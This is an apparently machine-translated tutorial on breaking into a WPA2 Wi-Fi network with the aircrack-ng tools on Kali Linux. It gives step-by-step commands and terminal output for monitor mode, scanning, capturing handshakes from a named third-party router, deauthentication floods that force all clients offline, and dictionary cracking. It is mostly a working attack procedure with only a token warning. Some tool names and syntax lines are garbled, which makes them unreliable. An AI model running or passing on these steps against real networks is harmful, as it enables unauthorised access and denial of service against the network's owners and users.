1, Preparation stage
- Attack host: kali Linux
- Attack tools: airrack ng, airdump ng, air ng, and air replay ng
- One network card
My network card name is wlan0
root@kali:~# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:off
2, Attack phase
1. Stop 🛑 Network administrator and kill process
stop it 🛑 network administrator
sudo service network-manager stop
sudo airmon-ng check kill
After the above two steps, you can find that the network card name has changed from wlan0 to wlan0mon
root@kali:~# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:off
2. Enable network card monitoring mode
After monitoring is enabled, you can monitor nearby routing devices through the network card.
Syntax: sudo airport ng start network card name
sudo airmon-ng start wlan0mon
The following forms indicate successful opening!
root@kali:~# sudo airmon-ng start wlan0mon PHY Interface Driver Chipset phy0 wlan0mon rt2800usb Ralink Technology, Corp. RT2870/RT3070 (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)
3. Capture packets
Capturing data packets refers to scanning the nearby router through the network card. The distance of scanning is determined by the quality of your network card. Through scanning, you can get the MAC address (BSSID), channel (CH) value, WiFi name, encryption method, etc.
Syntax: airodump ng network card name
sudo airodump-ng wlan0mon
When you see the WiFi name of the route to be attacked (target), press CTRL+C to stop, as shown in the following figure: (I want to attack the router with the WiFi name of CMCC Qingfeng)
root@kali:~# airodump-ng wlan0mon CH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 80:54:6A:6C:BA:C0 -50 407 4907 40 1 130 WPA2 CCMP PSK CMCC-QingFeng BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) 22:C9:4E:48:C1:16 -78 0 - 1 0 12 80:54:6A:6C:BA:C0 38:37:8B:07:71:69 -18 0e- 6 0 534 80:54:6A:6C:BA:C0 7C:B3:7B:95:BA:50 -62 0e- 0e 8 2476 80:54:6A:6C:BA:C0 F4:70:AB:95:A1:14 -78 0e- 1 0 1375 80:54:6A:6C:BA:C0 70:C9:4E:48:C1:16 -76 0e- 1 396 2485 CMCC-QingFeng Quitting...
4. Get data package
The function of obtaining data packets is mainly to prepare for the following cracking.
sudo airodump-ng -c -w --bssid adapter name
- -c: Channel value
- -w: The saved path of the obtained packet
- – bssid: MAC address
sudo airodump-ng -c 1 -w /root/admin --bssid 80:54:6A:6C:BA:C0 wlan0mon
5. Inject data packet
Send data packets to the routing device continuously. In this process, all connected devices will be forced offline. If it can be cracked directly, it will be displayed in the upper right corner of the terminal in step 4. The fourth step is not shown in the figure. Some encryption methods are not easy to be cracked, which is affected by many factors, such as the strength of the dictionary and the host.
sudo aireplay-ng -0 n -a adapter name
- -0: indicates that the authentication packet is cancelled
- n: Indicates the number of attacks (the number of packets sent to the router)
- -a: BSSID value of the corresponding router
- Network card name: the name of your own network card, which can be viewed through sudo iwconfig
Step 4: don't close the terminal. Create a new terminal and enter the following code to attack the router. At this time, you can find that you can't connect to the router at all. If you have previously connected to the router, you can find that the client is forced offline after executing the following command. The length of time is determined by the number of attacks. In the following example, my number of attacks is 5.
sudo aireplay-ng -0 5 -a 80:54:6A:6C:BA:C0 wlan0mon
root@kali:~# sudo aireplay-ng -0 5 -a 80:54:6A:6C:BA:C0 wlan0mon 00:34:39 Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 00:34:39 Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0] 00:34:40 Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0] 00:34:40 Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
Note: when you execute the above command, all connected clients will be forced to offline. Remember! Remember! Remember, don't use this to do something illegal.
5.WiFi password cracking
This step is to crack the password. Whether you can crack it depends on the strength of your dictionary and the strength of the host. There is also the need to be patient. Ha ha!
Syntax: airtrack ng - W dictionary path has Cap path